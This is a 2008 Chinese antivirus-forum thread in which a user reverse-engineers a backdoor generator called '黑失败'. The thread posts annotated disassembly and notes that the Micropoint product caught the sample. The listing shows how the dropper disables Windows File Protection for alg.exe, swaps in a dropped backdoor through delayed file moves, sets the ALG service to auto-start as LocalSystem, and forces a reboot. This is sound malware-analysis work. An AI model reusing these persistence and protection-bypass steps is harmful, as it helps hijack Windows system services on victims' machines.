点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
#1 【黑失败】在"微点"面前果然很失败
 
 
好久不玩样本了,无聊去黑基转转,搞了一头“黑失败”的生成器下来,说明很强大,猜想它的蓝屏不是杀子系统就是winlogon,有损本本寿命,用重新启动生了一个,一看没壳,汇编写的。
004011BB |. 8945 E8 mov dword ptr ss:[ebp-18],eax
004011BE |. 53 push ebx ; /WideBufSize
004011BF |. FF75 E8 push dword ptr ss:[ebp-18] ; |WideCharBuf
004011C2 |. 6A FF push -1 ; |StringSize = FFFFFFFF (-1.)
004011C4 |. 68 84344000 push 复件_复?00403484 ; |StringToMap = "C:\windows\system32\alg.exe"
004011C9 |. 6A 00 push 0 ; |Options = 0
004011CB |. 6A 00 push 0 ; |CodePage = CP_ACP
004011CD |. E8 4C030000 call <jmp.&kernel32.MultiByteToWideChar> ; \MultiByteToWideChar
004011D2 |. 68 2E344000 push 复件_复?0040342E ; /FileName = "sfc_os.dll"
004011D7 |. E8 2A030000 call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
004011DC |. 6A 05 push 5 ; /ProcNameOrOrdinal = #5
004011DE |. 50 push eax ; |hModule
004011DF |. E8 0A030000 call <jmp.&kernel32.GetProcAddress> ; \GetProcAddress
004011E4 |. 8945 E4 mov dword ptr ss:[ebp-1C],eax
004011E7 |. 6A FF push -1
004011E9 |. FF75 E8 push dword ptr ss:[ebp-18]
004011EC |. 6A 00 push 0
004011EE |. FF55 E4 call dword ptr ss:[ebp-1C] ;调用SfcFileException对C:\windows\system32\alg.exe去除SFC保护
查找自身3E8资源,释放到%SystemRoot%\system32\目录下命名为DNA.dll,同理找资源7D0释放algdna.exe,接下来
00401343 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401348 |. 68 84344000 push 复件_复?00403484 ; |Buffer = 复件_复?00403484
0040134D |. E8 A2010000 call <jmp.&kernel32.GetSystemDirectoryA> ; \GetSystemDirectoryA
00401352 |. 68 56344000 push 复件_复?00403456 ; /StringToAdd = "\alg.exe"
00401357 |. 68 84344000 push 复件_复?00403484 ; |ConcatString = "C:\windows\system32\alg.exe"
0040135C |. E8 F3010000 call <jmp.&kernel32.lstrcatA> ; \lstrcatA
00401361 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401366 |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
0040136C |. 50 push eax ; |Buffer
0040136D |. E8 82010000 call <jmp.&kernel32.GetSystemDirectoryA> ; \GetSystemDirectoryA
00401372 |. 68 5F344000 push 复件_复?0040345F ; /StringToAdd = "\sdk"
00401377 |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
0040137D |. 50 push eax ; |ConcatString
0040137E |. E8 D1010000 call <jmp.&kernel32.lstrcatA> ; \lstrcatA
00401383 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
00401385 |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
0040138B |. 50 push eax ; |NewName,"C:\windows\system32\sdk"
0040138C |. 68 84344000 push 复件_复?00403484 ; |ExistingName = "C:\windows\system32\alg.exe"
00401391 |. E8 82010000 call <jmp.&kernel32.MoveFileExA> ; \MoveFileExA,将alg.exe延时搬家到sdk
00401396 |. 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
00401398 |. 6A 00 push 0 ; |NewName = NULL
0040139A |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
004013A0 |. 50 push eax ; |ExistingName,"C:\windows\system32\sdk"
004013A1 |. E8 72010000 call <jmp.&kernel32.MoveFileExA> ; \MoveFileExA,延时拆房
004013A6 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
004013AB |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
004013B1 |. 50 push eax ; |Buffer
004013B2 |. E8 3D010000 call <jmp.&kernel32.GetSystemDirectoryA> ; \GetSystemDirectoryA
004013B7 |. 68 64344000 push 复件_复?00403464 ; /StringToAdd = "\algdna.exe"
004013BC |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
004013C2 |. 50 push eax ; |ConcatString
004013C3 |. E8 8C010000 call <jmp.&kernel32.lstrcatA> ; \lstrcatA
004013C8 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004013CA |. 68 84344000 push 复件_复?00403484 ; |NewName = "C:\windows\system32\alg.exe"
004013CF |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
004013D5 |. 50 push eax ; |ExistingName,"C:\windows\system32\algdna.exe"
004013D6 |. E8 3D010000 call <jmp.&kernel32.MoveFileExA> ; \MoveFileExA,把后门放到拆过房的地基上,重盖房?很勤劳!换个门不可以么?
004013DB |. 68 04010000 push 104 ; /BufSize = 104 (260.)
004013E0 |. 8D85 D0FDFFFF lea eax,dword ptr ss:[ebp-230] ; |
004013E6 |. 50 push eax ; |PathBuffer
004013E7 |. 6A 00 push 0 ; |hModule = NULL
004013E9 |. E8 F4000000 call <jmp.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA
004013EE |. 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
004013F0 |. 6A 00 push 0 ; |NewName = NULL
004013F2 |. 8D85 D0FDFFFF lea eax,dword ptr ss:[ebp-230] ; |
004013F8 |. 50 push eax ; |ExistingName,"C:\~~\黑失败2008 SP2正式版\复件 复件 客户端.exe"
004013F9 |. E8 1A010000 call <jmp.&kernel32.MoveFileExA> ; \MoveFileExA,喝慢性毒药
然后 (字数限制未完 接下楼:。。)
| |
※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint |
|
|
2008-7-27 16:42 |
|
点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
#2
004013FE |. 68 3F000F00 push 0F003F
00401403 |. 6A 00 push 0
00401405 |. 6A 00 push 0
00401407 |. E8 A6000000 call <jmp.&advapi32.OpenSCManagerA>
0040140C |. 8BD8 mov ebx,eax
0040140E |. 68 FF010F00 push 0F01FF
00401413 |. 68 70344000 push 客户端.00403470 ; ASCII "ALG"
00401418 |. 53 push ebx
00401419 |. E8 9A000000 call <jmp.&advapi32.OpenServiceA> ;打开ALG服务
0040141E |. 8BF8 mov edi,eax
00401420 |. 53 push ebx
00401421 |. E8 7A000000 call <jmp.&advapi32.CloseServiceHandle>
00401426 |. 68 04010000 push 104 ; /Length = 104 (260.)
0040142B |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
00401431 |. 50 push eax ; |Destination
00401432 |. E8 05010000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory
00401437 |. 6A 00 push 0 ; /DisplayName = NULL
00401439 |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
0040143F |. 50 push eax ; |Password
00401440 |. 68 74344000 push 客户端.00403474 ; |ServiceStartName = "LocalSystem"
00401445 |. 6A 00 push 0 ; |pDependencies = NULL
00401447 |. 6A 00 push 0 ; |pTagId = NULL
00401449 |. 6A 00 push 0 ; |LoadOrderGroup = NULL
0040144B |. 6A 00 push 0 ; |BinaryPathName = NULL
0040144D |. 6A FF push -1 ; |ErrorControl = SERVICE_NO_CHANGE
0040144F |. 6A 02 push 2 ; |StartType = SERVICE_AUTO_START,改变服务启动类型为自动,之前为手动
00401451 |. 68 20010000 push 120 ; |ServiceType = SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
00401456 |. 57 push edi ; |hService
00401457 |. E8 3E000000 call <jmp.&advapi32.ChangeServiceConfigA>; \ChangeServiceConfigA
0040145C |. 57 push edi
0040145D |. E8 3E000000 call <jmp.&advapi32.CloseServiceHandle>
最后拿到自杀令牌准备开机后自杀,^_^
004010BC /$ 55 push ebp
004010BD |. 8BEC mov ebp,esp
004010BF |. 83C4 EC add esp,-14
004010C2 |. 8D4D FC lea ecx,dword ptr ss:[ebp-4]
004010C5 |. E8 12040000 call <jmp.&kernel32.GetCurrentProcess> ; [GetCurrentProcess
004010CA |. 51 push ecx ; /phToken
004010CB |. 68 FF010F00 push 0F01FF ; |DesiredAccess = STANDARD_RIGHTS_REQUIRED|TOKEN_ASSIGN_PRIMARY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE|TOKEN_QUERY|TOKEN_QUERY_SOURCE|TOKEN_ADJUST_PRIVILEGES|TOKEN_ADJUST_GROUPS|TOKEN_ADJUST_DEFAULT|100
004010D0 |. 50 push eax ; |hProcess
004010D1 |. E8 D6030000 call <jmp.&advapi32.OpenProcessToken> ; \OpenProcessToken
004010D6 |. C745 EC 01000000 mov dword ptr ss:[ebp-14],1
004010DD |. 8D45 F0 lea eax,dword ptr ss:[ebp-10]
004010E0 |. 50 push eax ; /pLocalId
004010E1 |. 68 00344000 push 客户端.00403400 ; |Privilege = "SeShutdownPrivilege"
004010E6 |. 6A 00 push 0 ; |SystemName = NULL
004010E8 |. E8 B9030000 call <jmp.&advapi32.LookupPrivilegeValueA> ; \LookupPrivilegeValueA
004010ED |. C745 F8 02000000 mov dword ptr ss:[ebp-8],2
004010F4 |. 6A 00 push 0 ; /pRetLen = NULL
004010F6 |. 6A 00 push 0 ; |pPrevState = NULL
004010F8 |. 6A 10 push 10 ; |PrevStateSize = 10 (16.)
004010FA |. 8D45 EC lea eax,dword ptr ss:[ebp-14] ; |
004010FD |. 50 push eax ; |pNewState
004010FE |. 6A 00 push 0 ; |DisableAllPrivileges = FALSE
00401100 |. FF75 FC push dword ptr ss:[ebp-4] ; |hToken
00401103 |. E8 8C030000 call <jmp.&advapi32.AdjustTokenPrivileges> ; \AdjustTokenPrivileges
00401108 |. 50 push eax
00401109 |. FF75 FC push dword ptr ss:[ebp-4] ; /hObject
0040110C |. E8 AD030000 call <jmp.&kernel32.CloseHandle> ; \CloseHandle
创建自杀条件
00401462 |. E8 55FCFFFF call 客户端.004010BC
00401467 |. 6A 00 push 0 ; /Reserved = 0
00401469 |. 6A 02 push 2 ; |Options = EWX_REBOOT
0040146B |. E8 1E000000 call <jmp.&user32.ExitWindowsEx> ; \ExitWindowsEx
总之很好很强大,在微点面前不愧为“黑失败”,只有自杀功能完成了,也就是前面代码为什么会以复件方式出现的原因了。微点两次报警全部放过,房子吔拆了,只不过拆的不是很高名,自杀水平倒是不错,重启后一个病毒进程都没发现,原因见微点日志,^_^。
 
BY::unknown author
| |
※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint |
|
|
|
2008-7-27 16:43 |
|
遥遥遥遥
新手上路
积分 1
发帖 1
注册 2008-7-27
|
#3
很好很强大
| |
※ ※ ※ 本文纯属【遥遥遥遥】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-7-27 18:17 |
|
点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
|
|
2008-11-7 09:33 |
|
yurong7777777
高级用户
积分 536
发帖 534
注册 2008-9-12
|
#5
秀好很欣喜
| |
※ ※ ※ 本文纯属【yurong7777777】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-11-7 17:37 |
|
|
